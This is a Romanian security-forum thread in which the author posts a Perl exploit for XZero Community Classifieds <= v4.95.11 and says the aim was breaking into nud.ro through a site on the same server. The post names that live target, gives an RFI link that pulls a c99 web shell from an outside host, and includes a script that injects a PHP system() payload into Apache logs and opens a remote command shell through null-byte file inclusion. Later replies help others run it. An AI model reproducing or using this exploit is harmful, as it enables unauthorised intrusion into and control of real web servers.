Jump to content
kw3rln

[RST] XZero Community Classifieds <= v4.95.11 LFI &

By kw3rln, in Exploituri

Recommended Posts

kw3rln Newbie

kw3rln

Posted
Posted

a incercat un prieten sa ia access la nud.ro asa ca am zis de ce nu sa intram pe server... am cautat pe site-urile de pe acelasi server cu nud.ro si am gasit http://www.diasporaromana.com .. softul era xzero..downloadat si am spus ca le si public daca tot am gasit bugurile

oricum astea nu va intereseaza LFI -u.. sql injection..exploitul facut de mine... ! uitati RFI-ul:

http://rstcenter.com/forum/xzero-community-classifieds-v4-95-11-rfi-t9582.rst

Link RFI:

http://www.diasporaromana.com/config.inc.php?path_escape=http://hdtv-il.com/c99.txt?

#!/usr/bin/perl
#
# XZero Community Classifieds  <= v4.95.11 LFI & SQL Injection
# linK : [url]http://www.xzeroscripts.com[/url]
# download: [url]http://rapidshare.com/files/66809648/XZCl4.95.11.rar[/url]
#
# (c)od3d and f0unded by Kw3rLn from Romanian Security Team a.K.A [url]http://rstcenter.com[/url]
#
# Local file inclusion in index.php: 
#
#  switch($xview)
#		{
#                      [ ..... ]
#			case "page"			: $page = "$_GET[pagename].php";	break;
#		       [ ..... ]
#		}
#
#  include_once($page);
# in common.inc.php line 40: $xview = $_GET['view'] ? $_GET['view'] : "main";
#
# SQL Injection in post.php
# line 511: $sql = "SELECT expireafter FROM $t_subcats WHERE subcatid = $_REQUEST[subcatid]";
# ( And more but useless cuz admin password is in config.inc.php)
# 
# LFI: [url]http://site.com/index.php?view=page&pagename=[/url][Local_FIle]%00
# Example: [url]http://www.diasporaromana.com/index.php?view=page&pagename=tetete[/url]
#
# SQL: [url]http://site.com/index.php?view=post&cityid=2?=en&catid=2&subcatid=[/url][SQL]
# Example: http://www.diasporaromana.com/index.php?view=post&cityid=220?=en&catid=5&subcatid=18'
#
#GREETZ TO ALL RST MEMBERZ
# And now exploit for LFI
#
use IO::Socket;
use LWP::Simple;


@apache=(
"../../../../../var/log/httpd/access_log",
"../../../../../var/log/httpd/error_log",
"../apache/logs/error.log",
"../apache/logs/access.log",
"../../apache/logs/error.log",
"../../apache/logs/access.log",
"../../../apache/logs/error.log",
"../../../apache/logs/access.log",
"../../../../apache/logs/error.log",
"../../../../apache/logs/access.log",
"../../../../../apache/logs/error.log",
"../../../../../apache/logs/access.log",
"../logs/error.log",
"../logs/access.log",
"../../logs/error.log",
"../../logs/access.log",
"../../../logs/error.log",
"../../../logs/access.log",
"../../../../logs/error.log",
"../../../../logs/access.log",
"../../../../../logs/error.log",
"../../../../../logs/access.log",
"../../../../../etc/httpd/logs/access_log",
"../../../../../etc/httpd/logs/access.log",
"../../../../../etc/httpd/logs/error_log",
"../../../../../etc/httpd/logs/error.log",
"../../.. /../../var/www/logs/access_log",
"../../../../../var/www/logs/access.log",
"../../../../../usr/local/apache/logs/access_log",
"../../../../../usr/local/apache/logs/access.log",
"../../../../../var/log/apache/access_log",
"../../../../../var/log/apache/access.log",
"../../../../../var/log/access_log",
"../../../../../var/www/logs/error_log",
"../../../../../var/www/logs/error.log",
"../../../../../usr/local/apache/logs/error_log",
"../../../../../usr/local/apache/logs/error.log",
"../../../../../var/log/apache/error_log",
"../../../../../var/log/apache/error.log",
"../../../../../var/log/access_log",
"../../../../../var/log/error_log"
);

print "[RST] XZero Community Classifieds <= v4.95.11 Remote Command Execution Exploit\n";
print "[RST] need magic_quotes_gpc = off\n";
print "[RST] c0ded by Kw3rLN from Romanian Security Team [ [url]http://rstcenter.com[/url] ] \n\n";


if (@ARGV < 3)
{
    print "[RST] Usage: xzero.pl [host] [path] [apache_path]\n\n";
    print "[RST] Apache Path: \n";
    $i = 0;
    while($apache[$i])
    { print "[$i] $apache[$i]\n";$i++;}
    exit();
}

$host=$ARGV[0];
$path=$ARGV[1];
$apachepath=$ARGV[2];

print "[RST] Injecting some code in log files...\n";
$CODE="<?php ob_clean();system(\$HTTP_COOKIE_VARS[cmd]);die;?>";
$socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$host", PeerPort=>"80") or die "[RST] Could not connect to host.\n\n";
print $socket "GET ".$path.$CODE." HTTP/1.1\r\n";
print $socket "User-Agent: ".$CODE."\r\n";
print $socket "Host: ".$host."\r\n";
print $socket "Connection: close\r\n\r\n";
close($socket);
print "[RST] Shell!! write q to exit !\n";
print "[RST] IF not working try another apache path\n\n";

print "[shell] ";$cmd = <STDIN>;

while($cmd !~ "q") {
    $socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$host", PeerPort=>"80") or die "[RST] Could not connect to host.\n\n";

    print $socket "GET ".$path."index.php?view=page&pagename=".$apache[$apachepath]."%00&cmd=$cmd HTTP/1.1\r\n";
    print $socket "Host: ".$host."\r\n";
    print $socket "Accept: */*\r\n";
    print $socket "Connection: close\r\n\n";

    while ($raspuns = <$socket>)
    {
        print $raspuns;
    }

    print "[shell] ";
    $cmd = <STDIN>;
}

michee Newbie

michee

Posted
Posted

revin cu o intrebare ca-s prost si n-am facut LFI niciodata....

deci scriptul trebuie rulata cam asa ceva, da?

perl diaspora.pl www.diasporaromana.ro / 1

unde ultimul numar e o cifra care reprezitna numarul de elemente din array-yl apache...nu? Si deci eu tre sa le incerc pe toate manual sa vad in care s-a injectat codul php???

anyway eu obtin eroare asta:

[RST] Injecting some code in log files...

[RST] Could not connect to host.

nush din ce motive.....nu ma pricep la perl, dar din ce-am vazut eu acolo ar trebui sa mearga.....la altii a mers? ce,cum?

ps: de asemenea mie nu-mi iese LFI-ul folosind smecheria cu %00

imi apare ceva de genul cannot include pagina.php\0.php . Daca las doar

pagename=index, Adauga el extensia ".php" care e in sursa softului si merge....Dar de ce nu pot sa-l pacalesc folosind %00 cum am citit prin tutoriale?

tw8 Newbie

tw8

Posted
Posted
nu a testat nimeni exploitul asta?

Scuze ca iti raspund abia acum la intrebarea de mai sus, dar nici nu am vazut-o.

perl diaspora.pl www.diasporaromana.ro / 1

unde ultimul numar e o cifra care reprezitna numarul de elemente din array-yl apache...nu? Si deci eu tre sa le incerc pe toate manual sa vad in care s-a injectat codul php???

Nu. Tu trebuie sa gasesti path-ul logului si sa il introduci. Scriptul nu testeaza automat toate elementele vectorului, ci trebuie sa introduci log-ul manual. Vectorul e folosit doar pentru afisarea posibilelor locatii ale log-ului.

ps: de asemenea mie nu-mi iese LFI-ul folosind smecheria cu %00

Folosind exploit-ul pus de kwe, nu mai trebuie introdus "%00", pentru ca il adauga automat. Oricum, ar trebui sa mearga si daca il mai adaugi si to odata.

Nu am testat exploit-ul, pentru ca nu mi-a trebuit inca. Oricum, o sa il testez si iti zic daca imi merge sau nu ;).

michee Newbie

michee

Posted
Posted

no problem tw8 ptr intarzierie.

kw3rln stiu ca exista si RFI, dar eu voiam sa operez LFI-ul ca n-am mai facut.

Deci eu ziceam asa......am incercat direct in browser LFI si voiam sa afisez una din paginile care le-am vazut in directorul curent(folosind RFI-ul)

si cand adaugam la sfarsit %00 cum se obisnuieste nu functiona!

Imi arata un warning php ca nu poate sa includa ceva de genul

nume\00.php. Deci nu prea functiona null-ul adaugat.

@kw3rln poti sa-mi arati un exemplu concrect ca nu-mi dau seama ce-mi scapa?

Eu cand apelez scriptul tre sa-i dau la sfarsit un numar care-mi indica ce element din vector alege ca path,nu?

Thanks!

tw8 Newbie

tw8

Posted
Posted
Eu cand apelez scriptul tre sa-i dau la sfarsit un numar care-mi indica ce element din vector alege ca path,nu?

Nu. Trebuie sa bagi path-ul, nu numarul acestuia in vector.

kw3rln Newbie

kw3rln

Posted
  • Author
Posted

@kw3rln poti sa-mi arati un exemplu concrect ca nu-mi dau seama ce-mi scapa?

Eu cand apelez scriptul tre sa-i dau la sfarsit un numar care-mi indica ce element din vector alege ca path,nu?

Thanks!

da

la exploit nu m-am kinuit ff mult niciodata.. puteam face sa injecteze codu malicios in toate pathurile si apoi sa verifice el singur fiecare path in parte sa nu mai fie dat de user

anyway exemplu?

am facut un fisier in dirul adpics/kw3.php si contine "local file inclusion ! TESTING"

http://www.diasporaromana.com/index.php?view=page&pagename=adpics/kw3

daca dam

http://www.diasporaromana.com/index.php?view=page&pagename=adpics/kw3.php

va incercat sa ne includa adpics/kw3.php.php si nu merge asa ca incercam metoda cu Null Byte %00

http://www.diasporaromana.com/index.php?view=page&pagename=adpics/kw3.php%00

Failed opening 'adpics/kw3.php\0.php' for inclusion

in cazul acestui site nu merge deoarece magic_quotes_gpc ii on

tw8 Newbie

tw8

Posted
Posted

M-am uitat mai atent peste cod, si am observat asta:

print $socket "GET ".$path."index.php?view=page&pagename=".$apache[$apachepath]."%00&cmd=$cmd HTTP/1.1\r\n";

Concluzia: da, trebuie sa introduci numarul corespunzator path-ului (cu toate ca a confirmat si kwe asta, am vrut sa imi rectific greseala :P).

michee Newbie

michee

Posted
Posted

da kw3 de la get_magic_quotes on era aia, nu mi-a picat fisa!

Bv tie!:)

ps: deci daca ma gandesc eu bine.....nu prea poti sa incluzi unul din logurile alea apache avand in vedere ca nu poti sa scoti extensia aia .php,este?

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
Go to topic listing
×
×
  • Create New...